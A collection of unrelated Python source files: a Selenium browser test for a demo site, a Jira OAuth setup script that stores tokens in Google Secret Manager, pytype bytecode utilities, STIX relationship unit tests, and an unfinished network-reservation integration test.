        self.wnd_mng = selenium_taurus_extras.WindowManager(self.driver)
    def tearDown(self):
        """Shut down the browser session after each test."""
        self.driver.quit()
def test_requests(self):
self.driver.implicitly_wait(3.5)
with apiritif.transaction('/'):
self.driver.get('http://blazedemo.com/')
WebDriverWait(self.driver, 3.5).until(econd.presence_of_element_located((By.XPATH, _tpl.apply("//input[@type='submit']"))), 'Element "//input[@type=\'submit\']" failed to appear within 3.5s')
self.assertEqual(self.driver.title, _tpl.apply('BlazeDemo'))
ActionChains(self.driver).move_to_element(self.driver.find_element(By.XPATH, _tpl.apply('/html/body/div[2]/div/p[2]/a'))).perform()
ActionChains(self.driver).double_click(self.driver.find_element(By.XPATH, _tpl.apply('/html/body/div[3]/h2'))).perform()
ActionChains(self.driver).click_and_hold(self.driver.find_element(By.XPATH, _tpl.apply('/html/body/div[3]/form/select[1]'))).perform()
ActionChains(self.driver).release(self.driver.find_element(By.XPATH, _tpl.apply('/html/body/div[3]/form/select[1]/option[6]'))).perform()
Select(self.driver.find_element(By.NAME, _tpl.apply('toPort'))).select_by_visible_text(_tpl.apply('London'))
self.driver.find_element(By.CSS_SELECTOR, _tpl.apply('body input.btn.btn-primary')).send_keys(Keys.ENTER)
self.assertEqual(self.driver.find_element(By.ID, _tpl.apply('address')).get_attribute('value'), _tpl.apply('123 Beautiful st.'))
self.assertEqual(self.driver.find_element(By.XPATH, _tpl.apply('/html/body/div[2]/form/div[1]/label')).get_attribute('innerText'), _tpl.apply('${name}'))
WebDriverWait(self.driver, 3.5).until(econd.visibility_of_element_located((By.NAME, _tpl.apply('toPort'))), "Element 'toPort' failed to appear within 3.5s")
self.driver.find_element(By.NAME, _tpl.apply('toPort')).send_keys(_tpl.apply('B'))
self.driver.find_element(By.XPATH, _tpl.apply('//div[3]/form/select[1]//option[3]')).click()
self.driver.find_element(By.XPATH, _tpl.apply('//div[3]/form/select[2]//option[6]')).click()
self.wnd_mng.switch(_tpl.apply('0'))
self.wnd_mng.switch(_tpl.apply('win_ser_local'))
self.wnd_mng.switch(_tpl.apply('win_ser_1'))
self.wnd_mng.switch(_tpl.apply('that_window'))
self.wnd_mng.close(_tpl.apply('1'))
self.wnd_mng.close(_tpl.apply('win_ser_local'))
self.wnd_mng.close(_tpl.apply('win_ser_1'))
self.wnd_mng.close(_tpl.apply('that_window'))
self.driver.find_element(By.NAME, _tpl.apply('toPort')).submit()
self.driver.execute_script(_tpl.apply("alert('This is Sparta');"))
self.driver.switch_to.frame(self.driver.find_element(By.NAME, _tpl.apply('my_frame')))
self.driver.switch_to.frame(1)
if self.driver.find_element(By.ID, _tpl.apply('editor')).get_attribute('contenteditable'): self.driver.find_element(By.ID, _tpl.apply('editor')).clear(); self.driver.find_element(By.ID, _tpl.apply('editor')).send_keys(_tpl.apply('lo-la-lu'))
sleep(3)
self.driver.delete_all_cookies()
self.driver.find_element(By.LINK_TEXT, _tpl.apply('destination of the week! The Beach!')).click()
body = self.driver.page_source
re_pattern = re.compile(r'contained_text')
self.assertEqual(0, len(re.findall(re_pattern, body)), "Assertion: 'contained_text' found in BODY")
with apiritif.transaction('empty'):
pass
|
# Copyright 2020 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates OAuth credentials for a given Jira server, and optionally
saves those credentials to Google Secret Manager. This is a one-time
setup script that generates the credentials necessary for a client to
connect to a Jira server. It must be run manually.
How to use:
Show help message:
$ python3 jira_oauth_setup_script.py --help
Write Jira OAuth credentials to output files:
$ python3 jira_oauth_setup_script.py JIRA_URL
Write Jira OAuth credentials to output files and Google Secret Manager:
$ python3 jira_oauth_setup_script.py --gcp_project_id="PROJECT_ID" JIRA_URL
Supply your own RSA keys in files named `private.pem` and `public.pem` (can be
used to skip resetting up the Jira application link when running the script a
second time either to update the OAuth credentials or due to the script failing
halfway through the first run):
$ python3 jira_oauth_setup_script.py --load_keys JIRA_URL
Specify the consumer key to use for Jira OAuth authorization:
$ python3 jira_oauth_setup_script.py --consumer_key="CONSUMER_KEY" JIRA_URL
"""
import argparse
from requests_oauthlib import OAuth1Session
from oauthlib.oauth1 import SIGNATURE_RSA
from Crypto.PublicKey import RSA
from google.cloud import secretmanager
from google.api_core.exceptions import AlreadyExists
def create_secret(client, gcp_project_id, secret_id):
    """Create an (empty) secret container in Secret Manager.

    A secret is a logical wrapper around a collection of secret versions;
    the actual secret material is held by the versions (see
    add_secret_version).

    Args:
        client: A Secret Manager client to use to create the secret
        gcp_project_id: The id of the Google Cloud project in which to
            create the secret
        secret_id: The name of the secret to create
    """
    # Automatic replication lets Google decide where the payload is stored.
    secret_settings = {
        'replication': {
            'automatic': {},
        },
    }
    parent = client.project_path(gcp_project_id)
    created = client.create_secret(parent, secret_id, secret_settings)
    print('Created secret: {}'.format(created.name))
def add_secret_version(client, gcp_project_id, secret_id, payload):
    """Attach a new version holding `payload` to an existing secret.

    Args:
        client: A Secret Manager client to use to add the secret version
        gcp_project_id: The id of the Google Cloud project in which to
            add the secret version
        secret_id: The name of the secret to add a new version to
        payload: The payload of the new secret version; str payloads are
            UTF-8 encoded before upload, bytes are sent as-is
    """
    parent = client.secret_path(gcp_project_id, secret_id)
    # The API accepts raw bytes only, so encode textual payloads first.
    data = payload.encode('UTF-8') if isinstance(payload, str) else payload
    response = client.add_secret_version(parent, {'data': data})
    print('Added secret version: {}'.format(response.name))
def main():
    """Run the interactive one-time Jira OAuth 1.0a setup.

    Generates (or loads) an RSA key pair, walks the operator through
    creating the Jira application link, performs the three-legged OAuth
    dance, writes the resulting tokens to local files, and optionally
    stores all credentials in Google Secret Manager.
    """
    # Parse command line arguments
    parser = argparse.ArgumentParser(
        description=('Generate OAuth credentials for a given Jira server, and optionally '
                     'saves those credentials to Google Secret Manager. This is a one-time '
                     'setup script that generates the credentials necessary for a client to '
                     'connect to a Jira server. It must be ran manually.'))
    parser.add_argument('jira_url',
                        help=('URL of the Jira Server to setup OAuth for, e.g '
                              'https://jira.atlassian.com'))
    parser.add_argument('--gcp_project_id',
                        help=('ID of the Google Cloud project whose Secret Manager '
                              'to store Jira OAuth credentials in.'))
    parser.add_argument('--consumer_key',
                        help=('Consumer key to use for Jira OAuth authorization. '
                              'If not specified, default is "CloudMonitoringOauthKey"'),
                        default='CloudMonitoringOauthKey')
    parser.add_argument('--load_keys',
                        action='store_true',
                        help=('Load already generated private/public RSA keys called '
                              '"private.pem" and "public.pem"'))
    args = parser.parse_args()
    # Create or load in RSA public and private keys
    if args.load_keys:
        # Reusing keys from a previous run lets the operator keep the
        # existing Jira application link.
        with open('private.pem', 'rb') as f:
            private_key_pem = f.read()
        with open('public.pem', 'rb') as f:
            public_key_pem = f.read()
        print("RSA public and private keys loaded")
    else:
        # Fresh 2048-bit key pair; both halves are persisted so the script
        # can be re-run later with --load_keys.
        private_key = RSA.generate(2048)
        private_key_pem = private_key.exportKey('PEM')
        with open('private.pem', 'wb') as f:
            f.write(private_key_pem)
        public_key = private_key.publickey()
        public_key_pem = public_key.exportKey('PEM')
        with open('public.pem', 'wb') as f:
            f.write(public_key_pem)
        print("RSA public and private keys created")
    # Setup Jira Oauth
    application_links_url = f'{args.jira_url}/plugins/servlet/applinks/listApplicationLinks'
    print(f"""\nComplete the following steps:
1. In Jira, navigate to Jira Settings > Applications > Application Links
OR go to {application_links_url}
2. In the 'Enter the URL of the application you want to link' field, enter
http://example.com/ , and then click 'Create new link'. Ignore the 'No response was
received from the URL you entered' warning that is displayed and click 'Continue'
3. On the first screen of the 'Link applications' dialog, enter 'Cloud Monitoring App' for
'Application Name', select the 'Create incoming link' checkbox, and click 'Continue'
4. On next screen of the 'Link applications' dialog, enter the following consumer details:
* Consumer Key: {args.consumer_key}
* Consumer Name: Cloud Monitoring App
* Public Key:\n{public_key_pem.decode('utf-8')}
5: Click 'Continue'
(Note the previous steps are based off of the instructions at https://developer.atlassian.com/server/jira/platform/oauth/#create-an-application-link)
""")
    input('Once complete, press "Enter" to proceed\n')
    # RSA-SHA1-signed session; the verifier string must match what the
    # Jira server expects for this application link.
    oauth = OAuth1Session(args.consumer_key,
                          signature_method=SIGNATURE_RSA,
                          rsa_key=private_key_pem,
                          signature_type='auth_header',
                          verifier='jira_verifier')
    # Leg 1: obtain a temporary request token.
    request_token_url = f'{args.jira_url}/plugins/servlet/oauth/request-token'
    fetch_response = oauth.fetch_request_token(request_token_url)
    # NOTE(review): these two values are never used -- they are overwritten
    # by the access-token response below.
    oauth_token = fetch_response.get('oauth_token')
    oauth_token_secret = fetch_response.get('oauth_token_secret')
    # Leg 2: operator authorizes the request token in the browser.
    base_authorization_url = f'{args.jira_url}/plugins/servlet/oauth/authorize'
    authorization_url = oauth.authorization_url(base_authorization_url)
    print(f'Go to the following URL and click allow: {authorization_url}\n')
    input('Once complete, press "Enter" to proceed\n')
    # Leg 3: exchange the authorized request token for an access token.
    access_token_url = f'{args.jira_url}/plugins/servlet/oauth/access-token'
    oauth_tokens = oauth.fetch_access_token(access_token_url)
    oauth_token = oauth_tokens.get('oauth_token')
    oauth_token_secret = oauth_tokens.get('oauth_token_secret')
    with open('jira_access_token.txt', 'w') as f:
        f.write(oauth_token)
    print('Jira access token stored in jira_access_token.txt')
    with open('jira_access_token_secret.txt', 'w') as f:
        f.write(oauth_token_secret)
    print('Jira access token secret stored in jira_access_token_secret.txt')
    # Store Oauth data necessary to authorize Jira client in Google Secret Manager
    if args.gcp_project_id:
        client = secretmanager.SecretManagerServiceClient()
        # Each secret is created once; on re-runs we just add new versions.
        try:
            create_secret(client, args.gcp_project_id, 'jira_access_token')
        except AlreadyExists:
            print('Secret named "jira_access_token" already exists; adding new '
                  'secret version with the new access token')
        try:
            create_secret(client, args.gcp_project_id, 'jira_access_token_secret')
        except AlreadyExists:
            print('Secret named "jira_access_token_secret" already exists; adding new '
                  'secret version with the new access token secret')
        try:
            create_secret(client, args.gcp_project_id, 'jira_consumer_key')
        except AlreadyExists:
            print('Secret named "jira_consumer_key" already exists; adding new '
                  'secret version with the new consumer key')
        try:
            create_secret(client, args.gcp_project_id, 'jira_key_cert')
        except AlreadyExists:
            print('Secret named "jira_key_cert" already exists; adding new '
                  'secret version with the new key cert')
        add_secret_version(client, args.gcp_project_id, 'jira_access_token', oauth_token)
        add_secret_version(client, args.gcp_project_id, 'jira_access_token_secret', oauth_token_secret)
        add_secret_version(client, args.gcp_project_id, 'jira_consumer_key', args.consumer_key)
        add_secret_version(client, args.gcp_project_id, 'jira_key_cert', private_key_pem)
    print("Successfully setup Jira OAuth")
|
"""Functions for generating, reading and parsing pyc."""
import copy
import os
import re
import subprocess
import tempfile
from typing import List, Tuple
from pytype import compat
from pytype import pytype_source_utils
from pytype import utils
from pytype.pyc import compile_bytecode
from pytype.pyc import loadmarshal
from pytype.pyc import magic
import six
# Script (relative to the pytype source tree) used to compile bytecode in a
# child interpreter.
COMPILE_SCRIPT = "pyc/compile_bytecode.py"

# CPython compile errors look like: "message (filename, line N)".
COMPILE_ERROR_RE = re.compile(r"^(.*) \((.*), line (\d+)\)$")


class CompileError(Exception):
  """A compilation error.

  When the message follows CPython's "msg (file, line N)" shape, it is
  split into `error`, `filename` and `lineno`; otherwise the raw message
  is kept with filename=None and lineno=1.
  """

  def __init__(self, msg):
    super().__init__(msg)
    match = COMPILE_ERROR_RE.match(msg)
    if match is None:
      # Unstructured message: keep it verbatim and default the location.
      self.error = msg
      self.filename = None
      self.lineno = 1
    else:
      self.error, self.filename, lineno = match.groups()
      self.lineno = int(lineno)
def compile_src_string_to_pyc_string(
    src, filename, python_version, python_exe: Tuple[List[str], List[str]],
    mode="exec"):
  """Compile Python source code to pyc data.

  This may use py_compile if the src is for the same version as we're running,
  or else it spawns an external process to produce a .pyc file. The generated
  bytecode (.pyc file) is read and both it and any temporary files are deleted.

  Args:
    src: Python sourcecode
    filename: Name of the source file. For error messages.
    python_version: Python version, (major, minor).
    python_exe: Tuple of a path to a Python interpreter and command-line flags.
    mode: Same as builtins.compile: "exec" if source consists of a
      sequence of statements, "eval" if it consists of a single expression,
      or "single" if it consists of a single interactive statement.

  Returns:
    The compiled pyc file as a binary string.

  Raises:
    CompileError: If we find a syntax error in the file.
    IOError: If our compile script failed.
  """
  if utils.can_compile_bytecode_natively(python_version):
    # Fast path: the running interpreter can compile for this version, so do
    # it in-process without any temp files.
    output = six.BytesIO()
    compile_bytecode.compile_src_to_pyc(src, filename or "<>", output, mode)
    bytecode = output.getvalue()
  else:
    tempfile_options = {"mode": "w", "suffix": ".py", "delete": False}
    if six.PY3:
      tempfile_options.update({"encoding": "utf-8"})
    else:
      tempfile_options.update({"mode": "wb"})
    # delete=False: the child interpreter must be able to read the file after
    # we close it; it is removed explicitly in the `finally` below.
    fi = tempfile.NamedTemporaryFile(**tempfile_options)  # pylint: disable=consider-using-with
    try:
      if six.PY3:
        fi.write(src)
      else:
        fi.write(src.encode("utf-8"))
      fi.close()
      # In order to be able to compile pyc files for a different Python version
      # from the one we're running under, we spawn an external process.
      # We pass -E to ignore the environment so that PYTHONPATH and
      # sitecustomize on some people's systems don't mess with the interpreter.
      exe, flags = python_exe
      cmd = exe + flags + ["-E", "-", fi.name, filename or fi.name, mode]
      # The compile script is fed to the child on stdin ("-" above).
      compile_script_src = pytype_source_utils.load_binary_file(COMPILE_SCRIPT)
      with subprocess.Popen(
          cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE) as p:
        bytecode, _ = p.communicate(compile_script_src)
      assert p.poll() == 0, "Child process failed"
    finally:
      os.unlink(fi.name)
  # The compile script prefixes its stdout with a status byte:
  # 0 = success (pyc data follows), 1 = compile error (message follows).
  first_byte = six.indexbytes(bytecode, 0)
  if first_byte == 0:  # compile OK
    return bytecode[1:]
  elif first_byte == 1:  # compile error
    code = bytecode[1:]  # type: bytes
    raise CompileError(compat.native_str(code))
  else:
    raise IOError("_compile.py produced invalid result")
def parse_pyc_stream(fi):
  """Parse pyc data from a file.

  Args:
    fi: A file-like object.

  Returns:
    An instance of loadmarshal.CodeType.

  Raises:
    IOError: If we can't read the file or the file is malformed.
  """
  version = magic.magic_word_to_version(fi.read(2))
  # The two-byte magic word is always followed by CR LF.
  if fi.read(2) != b"\r\n":
    raise IOError("Malformed pyc file")
  fi.read(4)  # skip the timestamp
  if version >= (3, 3):
    # Skip the raw source size field, introduced in Python 3.3.
    fi.read(4)
  return loadmarshal.loads(fi.read(), version)
def parse_pyc_string(data):
  """Parse pyc data held in memory.

  Args:
    data: pyc data

  Returns:
    An instance of loadmarshal.CodeType.
  """
  stream = six.BytesIO(data)
  return parse_pyc_stream(stream)
class AdjustFilename:
  """Visitor that stamps a fixed co_filename onto every visited code object."""

  def __init__(self, filename):
    # Filename written into each code object by visit_code.
    self.filename = filename

  def visit_code(self, code):
    # Mutates `code` in place and returns it (the visit() protocol expects
    # the possibly-replaced object back).
    code.co_filename = self.filename
    return code
def compile_src(src, filename, python_version, python_exe, mode="exec"):
  """Compile a string to pyc, then load and parse the pyc.

  Args:
    src: Python source code.
    filename: The filename the sourcecode is from.
    python_version: Python version, (major, minor).
    python_exe: Tuple of the path to Python interpreter and command-line flags.
    mode: "exec", "eval" or "single".

  Returns:
    An instance of loadmarshal.CodeType.

  Raises:
    UsageError: If python_exe and python_version are mismatched.
  """
  data = compile_src_string_to_pyc_string(
      src, filename, python_version, python_exe, mode)
  code = parse_pyc_string(data)
  # Sanity-check that the interpreter we ran actually matches the version
  # the caller asked for.
  if code.python_version != python_version:
    raise utils.UsageError(
        "python_exe version %s does not match python version %s" %
        (utils.format_version(code.python_version),
         utils.format_version(python_version)))
  # Replace the temp-file name baked into the bytecode with the real one.
  visit(code, AdjustFilename(filename))
  return code
def visit(c, visitor):
  """Recursively process constants in a pyc using a visitor."""
  if not hasattr(c, "co_consts"):
    # Not a code object: plain constants pass through untouched.
    return c
  # c is a CodeType-like object (it has co_consts). Rewrite its constants
  # first, then let the visitor transform the code object itself.
  new_consts = [visit(const, visitor) for const in c.co_consts]
  if any(new is not old for new, old in zip(new_consts, c.co_consts)):
    # Copy-on-write: only clone the code object when a constant changed.
    c = copy.copy(c)
    c.co_consts = new_consts
  return visitor.visit_code(c)
|
<filename>stix/test/common/related_test.py
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
import unittest
from stix.test import EntityTestCase, assert_warnings
from stix.utils import silence_warnings
from stix.common.related import (
RelatedCampaign, RelatedCampaignRef, RelatedIdentity, RelatedCOA,
RelatedPackage, RelatedPackageRef, RelatedExploitTarget, RelatedIncident,
RelatedIndicator, RelatedObservable, RelatedThreatActor, RelatedTTP,
RelatedPackageRefs, RelatedPackages, RelatedReports, RelatedReport
)
class RelatedReportTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedReport (checked by EntityTestCase)."""
    klass = RelatedReport
    _full_dict = {
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
        'report': {
            'id': 'example:bar-1',
            'version': '1.0',
            'header': {
                'title': 'Test'
            }
        }
    }
class RelatedReportsTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedReports (a scoped list of two reports)."""
    klass = RelatedReports
    _full_dict = {
        'scope': 'inclusive',
        'related_reports': [
            {
                'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
                'information_source': {
                    'description': "Source of the relationship",
                },
                'relationship': "Associated",
                'report': {
                    'id': 'example:bar-1',
                    'version': '1.2',
                    'header': {
                        'title': 'Test'
                    }
                }
            },
            {
                'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
                'information_source': {
                    'description': "Source of the relationship",
                },
                'relationship': "Associated",
                'report': {
                    'id': 'example:bar-2',
                    'version': '1.2',
                    'header': {
                        'title': 'Test'
                    }
                }
            }
        ]
    }
class RelatedPackageRefsTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture plus append-behavior tests for RelatedPackageRefs."""
    klass = RelatedPackageRefs
    _full_dict = {
        'packages': [
            {
                'idref': "example:foo-1",
                'timestamp': "2014-01-31T06:14:46",
                'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
                'information_source': {
                    'description': "Source of the relationship",
                },
                'relationship': "Associated"
            },
            {
                'idref': "example:foo--2",
                'timestamp': "2014-01-31T06:14:46",
                'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
                'information_source': {
                    'description': "Source of the relationship",
                },
                'relationship': "Associated"
            }
        ]
    }

    @silence_warnings
    def test_add_stix_package(self):
        # A whole STIXPackage may be appended and counts as one entry.
        from stix.core import STIXPackage
        l = RelatedPackageRefs()
        l.append(STIXPackage())
        self.assertEqual(1, len(l))

    @silence_warnings
    def test_add_bad_type(self):
        # Entities of the wrong type are rejected with TypeError.
        from stix.indicator import Indicator
        l = RelatedPackageRefs()
        self.assertRaises(
            TypeError,
            l.append,
            Indicator()
        )

    @assert_warnings
    def test_deprecated_warning(self):
        # Appending a STIXPackage must emit a warning (asserted by decorator).
        from stix.core import STIXPackage
        l = RelatedPackageRefs()
        l.append(STIXPackage())
class RelatedPackageRefTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedPackageRef."""
    klass = RelatedPackageRef
    _full_dict = {
        'idref': "example:Campaign-133",
        'timestamp': "2014-01-31T06:14:46",
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
    }
class RelatedCampaignTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedCampaign."""
    klass = RelatedCampaign
    _full_dict = {
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
        'campaign': {
            'id': 'example:bar-1',
            'title': 'Test'
        }
    }
class RelatedIndicatorTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedIndicator."""
    klass = RelatedIndicator
    _full_dict = {
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
        'indicator': {
            'id': 'example:bar-1',
            'title': 'Test'
        }
    }
class RelatedIncidentTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedIncident."""
    klass = RelatedIncident
    _full_dict = {
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
        'incident': {
            'id': 'example:bar-1',
            'title': 'Test'
        }
    }
class RelatedExploitTargetTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedExploitTarget."""
    klass = RelatedExploitTarget
    _full_dict = {
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
        'exploit_target': {
            'id': 'example:bar-1',
            'title': 'Test'
        }
    }
class RelatedThreatActorTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedThreatActor."""
    klass = RelatedThreatActor
    _full_dict = {
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
        'threat_actor': {
            'id': 'example:bar-1',
            'title': 'Test'
        }
    }
class RelatedCOATests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedCOA (course of action)."""
    klass = RelatedCOA
    _full_dict = {
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
        'course_of_action': {
            'id': 'example:bar-1',
            'title': 'Test'
        }
    }
class RelatedTTPTests(EntityTestCase, unittest.TestCase):
    """Fixture for RelatedTTP.

    NOTE(review): most fields are commented out here, unlike the sibling
    fixtures -- only information_source is exercised. Confirm whether this
    was intentional or a leftover debugging change.
    """
    klass = RelatedTTP
    _full_dict = {
        #'confidence': {'value': {'value': "Medium", 'xsi:type':'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        #'relationship': "Associated",
        # 'ttp': {
        #     'id': 'example:bar-1',
        #     'title': 'Test'
        # }
    }
class RelatedIdentityTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedIdentity (uses 'name', not 'title')."""
    klass = RelatedIdentity
    _full_dict = {
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
        'identity': {
            'id': 'example:bar-1',
            'name': 'Test'
        }
    }
class RelatedObservableTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedObservable."""
    klass = RelatedObservable
    _full_dict = {
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
        'observable': {
            'id': 'example:bar-1',
            'title': 'Test'
        }
    }
class RelatedPackageTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedPackage (embeds a versioned package)."""
    klass = RelatedPackage
    _full_dict = {
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
        'package': {
            'id': 'example:bar-1',
            'version': '1.2',
            'stix_header': {
                'title': 'Test'
            }
        }
    }
class RelatedPackagesTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedPackages (scoped list of two packages)."""
    klass = RelatedPackages
    _full_dict = {
        'scope': 'inclusive',
        'related_packages': [
            {
                'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
                'information_source': {
                    'description': "Source of the relationship",
                },
                'relationship': "Associated",
                'package': {
                    'id': 'example:bar-1',
                    'version': '1.2',
                    'stix_header': {
                        'title': 'Test'
                    }
                }
            },
            {
                'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
                'information_source': {
                    'description': "Source of the relationship",
                },
                'relationship': "Associated",
                'package': {
                    'id': 'example:bar-2',
                    'version': '1.2',
                    'stix_header': {
                        'title': 'Test'
                    }
                }
            }
        ]
    }
class RelatedCampaignRefTests(EntityTestCase, unittest.TestCase):
    """Full-dict fixture for RelatedCampaignRef (idref + names, no body)."""
    klass = RelatedCampaignRef
    _full_dict = {
        'confidence': {'value': {'value': "Medium", 'xsi:type': 'stixVocabs:HighMediumLowVocab-1.0'}},
        'information_source': {
            'description': "Source of the relationship",
        },
        'relationship': "Associated",
        'campaign': {
            'idref': "example:foo-1",
            'timestamp': "2014-01-31T06:14:46",
            'names': ["foo", "bar"]
        }
    }
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
# Copyright 2018 Cable Television Laboratories, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from drp_python.reservation import Reservation, get_all_reservations
from drp_python.subnet import Subnet
from drp_python.network_layer.http_session import HttpSession
from drp_python.exceptions.drb_exceptions import NotFoundError, \
AlreadyExistsError
from drp_python.model_layer.reservation_config_model import \
ReservationConfigModel
from drp_python.model_layer.subnet_config_model import SubnetConfigModel
import logging
from uuid import uuid4
# Module-wide logging setup for the drp-python integration tests.
logging.basicConfig(
    format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] '
           '%(message)s',
    datefmt='%d-%m-%Y:%H:%M:%S',
    level=logging.WARNING)
logger = logging.getLogger('drp-python')

# TODO: Replace this with some kinda of inject for address and such
# Credentials for the DRP server under test ('<PASSWORD>' is a placeholder
# that must be substituted before running).
login = {'username': 'rocketskates', 'password': '<PASSWORD>'}

# Reservation fixture: ties a fixed IP to a MAC on the management network.
reservation_object = {
    'ip': "10.197.111.12",
    'mac': "10:7d:1a:68:0d:2f",
    'name': 'Admin_Interface',
    'type': 'management',
}

# Subnet fixture backing the reservation above; uuid4 in the name keeps
# repeated runs from colliding on the server.
subnet_object = {
    'address': '10.197.111.0',
    'broadcast_address': '10.197.111.255',
    'default_lease': 7200,
    'dn': 'cablelabs.com',
    'dns': '8.8.8.8',
    'listen_iface': 'eno1',
    'max_lease': 7200,
    'name': 'subnet-' + str(uuid4()),
    'netmask': '255.255.255.0',
    'range': '10.197.111.12 10.197.111.16',
    'router': '10.197.111.1',
    'next_server': '10.197.111.131',
    'type': 'management'
}
class ReservationTest(unittest.TestCase):
    """Integration tests for drp_python.reservation.Reservation.

    Requires a reachable Digital Rebar Provision server (address is
    hard-coded in setUp).

    Tests for functions located in ReservationHttps
    1. Create it if it doesn't exist
    2. Verify the reservation_model equals the reservation_config
    3. Update the reservation
    4. Verify the update matches the reservation_config
    5. Get all reservations
    6. Validate the count
    7. Delete the reservation
    8. Validate it was deleted
    """

    def setUp(self):
        # Open an authenticated session and ensure the backing subnet
        # exists before each test.
        self.session = HttpSession('https://10.197.113.126:8092',
                                   login['username'],
                                   login['password'])
        self.reservation_config_model = ReservationConfigModel(
            **reservation_object)
        self.reservation = Reservation(self.session,
                                       self.reservation_config_model)
        self.subnet_config = SubnetConfigModel(**subnet_object)
        self.subnet = Subnet(self.session, self.subnet_config)
        if not self.subnet.is_valid():
            self.subnet.create()
        temp = self.subnet.get()
        self.assertEqual(self.subnet_config.address, temp.address)

    def tearDown(self):
        # Clean up the fixtures created in setUp.
        if self.reservation is not None:
            self.reservation.delete()
        if self.subnet is not None:
            self.subnet.delete()

    def test_basic_create_reservation_flow(self):
        if not self.reservation.is_valid():
            self.reservation.create()
        model = self.reservation.get()
        self.assertEqual(model.name, self.reservation_config_model.name)
        self.assertEqual(model.ip, self.reservation_config_model.ip)
        self.assertEqual(model.mac, self.reservation_config_model.mac)
        self.assertEqual(model.type, self.reservation_config_model.type)
        # Fixed: assertEquals is a deprecated alias of assertEqual.
        self.assertEqual(model.extension, {})
        self.assertTrue(model.available)
        self.assertEqual(model.errors, [])
        self.assertTrue(model.validated)
        self.assertFalse(model.read_only)
        # Deleting the reservation should shrink the server-side list by one.
        temp = get_all_reservations(self.session)
        count = len(temp)
        self.reservation.delete()
        self.assertFalse(self.reservation.is_valid())
        temp = get_all_reservations(self.session)
        self.assertEqual(len(temp), count - 1)
        try:
            self.reservation.get()
            self.fail('Resource should be deleted')
        except NotFoundError:
            self.assertTrue(True)

    def test_create_existing_reservation_flow(self):
        self.reservation.create()
        self.assertTrue(self.reservation.is_valid())
        try:
            self.reservation.create()
